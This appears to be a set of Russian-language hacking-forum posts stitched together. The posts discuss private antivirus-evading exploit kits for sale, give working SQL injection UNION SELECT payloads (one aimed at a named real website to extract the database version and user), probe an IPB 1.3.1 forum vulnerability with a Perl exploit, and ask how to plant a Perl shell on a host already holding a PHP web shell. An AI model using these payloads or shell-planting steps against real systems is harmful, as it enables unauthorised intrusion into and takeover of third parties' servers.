В паблике такие связки, которые паляться антивирусами. А в привате, за очень неплохие деньги, антивирами не будет палиться, и распуститься быстро.
Пробуй вот так http://site.net/index.php?id=777+union+select+1,2,3/* должно быть корректно, затем подставь -777 и ищи вывод зачем тебе and+1=2 ?!?!
http://www.mibf.ru/index.php?id=23+union+select+null,null,null,null,null,null,null,0x73716C,null,null+limit+1,1+--+ редиректит на урл в котором вывод Code: http://www.mibf.ru/index.php?id=999999+union+select+null,null,null,null,null,null,null,concat_ws(0x3a,version(),user()),null,null+--+
Миллионер? Приватные связки, неплохо стоят, но если делается что то "шикарное", то деньги можно достать.
Приват льют на право и на лево и при хороших знакомствах у тебя будет все, что необходимо + файлообменники (очень уж часто не ставят пароли на архивы ) 2Dyxxx, спс, но уже разобрался...
Народ привет. Извините если боаян. Есть такая штука но не уверен что ето уязвимость. На форуме IPB версия 1.3.1 при вводе в урл такой строки http://[target]/ipb/index.php?act=Online&st=-1 видает такое: Что можно с етим сделать? или ничего? И еще если после запуска сплоита на перле с командной строки, там где должен находиться хеш пароля админа написало слово FAILED. Значит етим сплоитом ничего уже не сделаеш?
Скажите, пожалуйста, как залить перл шелл ? Сложность в том, что нужно заливать в ascii, а я не знаю как это сделать за неимением фтп-доступа.. доступны wget, lynx. может его создать прям на хосте можно(имется пхп веб шелл, доступна system() )
